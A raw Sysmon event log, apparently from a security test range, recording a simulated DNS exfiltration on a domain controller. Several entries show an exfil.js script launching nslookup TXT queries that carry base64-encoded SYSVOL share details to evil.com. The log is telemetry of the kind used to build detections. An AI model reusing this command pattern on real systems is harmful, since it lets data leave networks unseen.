14:16:32.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9540-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-17A1-629A-783D-000000005F02}55525936C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-9540-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.586{2E1864BB-17C0-629A-9540-000000005F02}7212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldhils.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.565{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyivt.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-17C0-629A-9340-000000005F02}10087236C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9440-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9440-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.534{2E1864BB-17C0-629A-9240-000000005F02}35006084C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-9440-000000005F02}2128C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.539{2E1864BB-17C0-629A-9440-000000005F02}2128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-9240-000000005F02}3500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyivt.tmp 2>&1 10341000x8000000000000000200755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.518{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9340-000000005F02}1008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.518{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9340-000000005F02}1008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.514{2E1864BB-17C0-629A-9340-000000005F02}10087236C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9240-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.495{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9340-000000005F02}1008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9240-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-17A1-629A-783D-000000005F02}55527204C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-9240-000000005F02}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.493{2E1864BB-17C0-629A-9240-000000005F02}3500C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyivt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.479{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwka.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000200743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{00000000-0000-0000-0000-000000000000}7288<unknown process>-udpfalsefalse127.0.0.1-52744-false127.0.0.1-53domain 354300x8000000000000000200742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52744- 354300x8000000000000000200741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{00000000-0000-0000-0000-000000000000}7288<unknown process>-udptruefalse127.0.0.1-52744-false127.0.0.1-53domain 354300x8000000000000000200740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{00000000-0000-0000-0000-000000000000}7288<unknown process>-udpfalsefalse127.0.0.1-52743-false127.0.0.1-53domain 354300x8000000000000000200739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52743- 354300x8000000000000000200738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.993{00000000-0000-0000-0000-000000000000}7288<unknown process>-udptruefalse127.0.0.1-52743-false127.0.0.1-53domain 354300x8000000000000000200737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.992{00000000-0000-0000-0000-000000000000}7288<unknown process>-udpfalsefalse127.0.0.1-52742-false127.0.0.1-53domain 354300x8000000000000000200736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.992{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52742- 354300x8000000000000000200735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.992{00000000-0000-0000-0000-000000000000}7288<unknown process>-udptruefalse127.0.0.1-52742-false127.0.0.1-53domain 354300x8000000000000000200734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{00000000-0000-0000-0000-000000000000}4336<unknown process>-udpfalsefalse127.0.0.1-52741-false127.0.0.1-53domain 354300x8000000000000000200733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52741- 354300x8000000000000000200732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{00000000-0000-0000-0000-000000000000}4336<unknown process>-udptruefalse127.0.0.1-52741-false127.0.0.1-53domain 354300x8000000000000000200731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{00000000-0000-0000-0000-000000000000}4336<unknown process>-udpfalsefalse127.0.0.1-52740-false127.0.0.1-53domain 354300x8000000000000000200730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52740- 354300x8000000000000000200729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.921{00000000-0000-0000-0000-000000000000}4336<unknown process>-udptruefalse127.0.0.1-52740-false127.0.0.1-53domain 354300x8000000000000000200728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.920{00000000-0000-0000-0000-000000000000}4336<unknown process>-udpfalsefalse127.0.0.1-52739-false127.0.0.1-53domain 354300x8000000000000000200727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.920{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52739- 354300x8000000000000000200726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.920{00000000-0000-0000-0000-000000000000}4336<unknown process>-udptruefalse127.0.0.1-52739-false127.0.0.1-53domain 354300x8000000000000000200725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.840{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52738- 354300x8000000000000000200724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.839{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52737- 354300x8000000000000000200723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.839{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52736- 354300x8000000000000000200722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.839{00000000-0000-0000-0000-000000000000}2132<unknown process>-udptruefalse127.0.0.1-52736-false127.0.0.1-53domain 354300x8000000000000000200721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.768{00000000-0000-0000-0000-000000000000}2632<unknown process>-udpfalsefalse127.0.0.1-52735-false127.0.0.1-53domain 354300x8000000000000000200720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.768{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 